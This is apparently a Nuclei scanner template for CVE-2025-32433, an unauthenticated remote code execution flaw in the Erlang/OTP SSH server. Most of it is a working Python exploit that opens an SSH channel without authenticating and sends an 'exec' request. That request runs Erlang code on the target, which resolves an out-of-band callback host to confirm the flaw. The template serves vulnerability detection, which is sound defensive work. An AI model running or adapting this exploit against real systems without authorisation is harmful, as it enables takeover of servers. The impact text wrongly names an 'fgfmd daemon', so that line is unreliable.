id: CVE-2025-32433 info: name: Erlang/OTP SSH - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch,darses severity: critical description: | Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. impact: | Unauthenticated attackers can execute arbitrary code or commands through specially crafted SSH protocol requests to the fgfmd daemon on Erlang/OTP SSH servers. remediation: | This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules. reference: - https://platformsecurity.com/blog/CVE-2025-32433-poc - https://github.com/erlang/otp/commit/0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12 - https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f - https://github.com/erlang/otp/commit/b1924d37fd83c070055beb115d5d6a6a9490b891 - https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2 - https://nvd.nist.gov/vuln/detail/CVE-2025-32433 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-32433 cwe-id: CWE-306 epss-score: 0.59722 epss-percentile: 0.98289 metadata: verified: true max-request: 1 shodan-query: "Erlang OTP" tags: cve,cve2025,erlang,otp,ssh,rce,oast,kev,vkev,vuln variables: OAST: "{{interactsh-url}}" code: - engine: - py - python3 source: | import socket,os import struct import time import binascii HOST = os.getenv('Host') PORT = os.getenv('Port') def hexdump(data): return ' '.join([f'{b:02x}' for b in data]) def string_payload(s): s_bytes = s.encode("utf-8") return struct.pack(">I", len(s_bytes)) + s_bytes def build_packet(payload): padding_length = 8 - ((len(payload) + 5) % 8) if padding_length < 4: padding_length += 8 packet_length = len(payload) + padding_length + 1 packet = ( struct.pack(">I", packet_length) + bytes([padding_length]) + payload + b"\x00" * padding_length ) return packet def build_channel_open(channel_id=0): return build_packet( b"\x5a" + string_payload("session") + struct.pack(">I", channel_id) + struct.pack(">I", 0x100000) + struct.pack(">I", 0x8000) + b"" ) def build_channel_request(channel_id=0, command=""): return build_packet( b"\x62" + struct.pack(">I", channel_id) + string_payload("exec") + b"\x01" + string_payload(command) ) def build_kexinit(): cookie = b"\x00" * 16 kex_algorithms = ["curve25519-sha256@libssh.org", "diffie-hellman-group14-sha1"] host_key_algorithms = ["ssh-rsa","rsa-sha2-512","rsa-sha2-256"] ciphers = ["aes128-ctr"] macs = ["hmac-sha1"] compression = ["none"] payload = ( b"\x14" + cookie + string_payload(",".join(kex_algorithms)) + string_payload(",".join(host_key_algorithms)) + string_payload(",".join(ciphers)) + string_payload(",".join(ciphers)) + string_payload(",".join(macs)) + string_payload(",".join(macs)) + string_payload(",".join(compression)) + string_payload(",".join(compression)) + string_payload("") + string_payload("") + b"\x00" + struct.pack(">I", 0) ) return build_packet(payload) def receive_packet(sock, timeout=5): sock.settimeout(timeout) try: size_data = sock.recv(4) if not size_data: return None packet_size = struct.unpack(">I", size_data)[0] packet = sock.recv(packet_size) return packet except socket.timeout: print("[!] Timeout waiting for response") return None except Exception as e: print(f"[!] Error receiving packet: {e}") return None try: with socket.create_connection((HOST, PORT)) as s: print("[*] Connecting to SSH server...") # Send initial SSH version with specific version string version = b"SSH-2.0-OpenSSH_7.4\r\n" s.sendall(version) banner = s.recv(1024) #print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}") #print("[*] Sending KEXINIT...") s.sendall(build_kexinit()) response = receive_packet(s) if response: print("[+] Received KEXINIT response") print("[*] Sending channel_open...") s.sendall(build_channel_open()) response = receive_packet(s) if response: print("[+] Channel opened successfully") msg_type = response[1] if len(response) > 1 else None time.sleep(1) # Try different payload formats payloads = [ 'inet:gethostbyname("' + os.getenv('OAST') + '").' ] for payload in payloads: print(f"[*] Trying payload: {payload}") s.sendall(build_channel_request(command=payload)) response = receive_packet(s) if response: print(f"[+] Response received for payload: {payload}") time.sleep(1) print("[*] Exploit attempt completed") except Exception as e: print(f"[!] Error during exploitation: {e}") matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' condition: and # digest: 4b0a00483046022100d77437ae3646473876df0b3ab3ef476e7a9fbd420a41bd5f2114462f3dcca898022100e5c8742b1ad73baa5254db4259a1598cea122b5f24a97678bfaedbd4ac7703ae:922c64590222798bb761d5b6d8e72950